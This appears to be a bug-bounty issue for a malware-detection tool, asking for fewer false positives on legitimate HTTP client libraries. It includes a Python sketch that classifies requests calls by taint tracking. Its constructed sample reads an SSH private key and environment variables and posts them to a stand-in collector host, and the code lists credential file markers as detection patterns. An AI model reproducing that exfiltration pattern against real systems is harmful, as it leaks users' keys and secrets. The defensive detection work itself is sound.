Bounty: Reduce false positives on legitimate HTTP clients
Reward: 500 $ISNAD
Track: Detection
Difficulty: Medium
Description
Improve detection accuracy by reducing false positives triggered by legitimate HTTP client libraries (axios, node-fetch, requests, urllib3). Current rules sometimes flag normal API usage patterns.
Requirements
- Audit current rules for HTTP client false positives
- Create allowlist patterns for common legitimate usage
- Add context-aware detection (distinguish data exfil from normal requests)
- Benchmark against top 500 npm and PyPI packages
- Maintain detection rate for actual malicious HTTP usage
- Tests passing
How to Submit
Open a PR referencing this issue. See Bounty Program for full rules.
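One possible shape for the context-aware requirement above, as an added sketch that is not the project's own rule code. It assumes a Python AST pass over `requests` calls; the keyword set, the path markers, the function names and the sample are all constructed for illustration. A call is flagged only when environment or credential-file data reaches the URL or body, so a token passed in `headers` stays benign.

```python
import ast

HTTP_METHODS = {"get", "post", "put", "patch", "request"}
CREDENTIAL_KWARGS = {"headers", "auth"}               # assumed: normal channel for an API token
SENSITIVE_PATHS = (".ssh", ".aws", ".npmrc", ".env")  # assumed marker list
def is_sensitive_source(node):
    """os.environ / os.getenv, or open() on a credential-like path."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return node.value.id == "os" and node.attr in ("environ", "getenv")
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "open":
        return any(isinstance(a, ast.Constant) and isinstance(a.value, str)
                   and any(m in a.value for m in SENSITIVE_PATHS) for a in node.args)
    return False

def touches_sensitive(expr, tainted):
    return any(is_sensitive_source(n) or (isinstance(n, ast.Name) and n.id in tainted)
               for n in ast.walk(expr))

def classify_http_calls(source):
    """Return [(lineno, method, verdict)] for every requests.<method>() call."""
    tree = ast.parse(source)
    assigns = [n for n in ast.walk(tree) if isinstance(n, ast.Assign)]
    tainted, changed = set(), True
    while changed:  # flow-insensitive fixpoint over simple name assignments
        changed = False
        for a in assigns:
            if touches_sensitive(a.value, tainted):
                for t in a.targets:
                    if isinstance(t, ast.Name) and t.id not in tainted:
                        tainted.add(t.id)
                        changed = True
    findings = []
    for n in ast.walk(tree):
        if (isinstance(n, ast.Call) and isinstance(n.func, ast.Attribute)
                and isinstance(n.func.value, ast.Name) and n.func.value.id == "requests"
                and n.func.attr in HTTP_METHODS):
            # URL and body arguments count as payload; headers/auth do not.
            payload = list(n.args) + [k.value for k in n.keywords if k.arg not in CREDENTIAL_KWARGS]
            suspect = any(touches_sensitive(p, tainted) for p in payload)
            findings.append((n.lineno, n.func.attr, "exfil-suspect" if suspect else "benign"))
    return sorted(findings)

# Constructed sample: two ordinary API calls and one call that ships secrets in the body.
SAMPLE = '''import os, requests
token = os.environ["API_TOKEN"]
r = requests.get("https://api.example.com/v1/items", headers={"Authorization": "Bearer " + token}, timeout=10)
secrets = dict(os.environ)
key = open("/home/user/.ssh/id_rsa").read()
requests.post("https://collector.example.net/u", json={"env": secrets, "k": key})
requests.get("https://pypi.org/simple/", timeout=5)
'''
```

The taint tracking is name-based and flow-insensitive, so it is a starting point for benchmarking against real packages rather than a finished rule.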